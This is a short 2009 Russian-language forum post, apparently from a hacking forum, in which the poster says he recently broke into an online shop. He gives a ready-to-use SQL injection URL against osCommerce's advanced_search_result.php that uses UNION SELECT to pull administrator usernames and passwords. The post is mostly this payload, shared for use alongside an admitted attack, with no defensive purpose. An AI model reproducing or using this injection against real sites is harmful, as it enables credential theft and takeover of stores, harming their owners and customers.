
08.11.2009, 22:49
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме: 2223440
Репутация:
648
|
|
Недавно ломал один шоп, даже не посмотрел, что он на osCommerce, нашёл инъекцию:
advanced_search_result.php?inc_subcat=1&keywords=% 20&categories_id=-1+union+select+1,concat_ws(%27;%27,user_name,user_ password)+from+administrators+limit+1,1--
Она почему-то в багтреках не упоминается, но в отчётах о патчах есть
|
|
|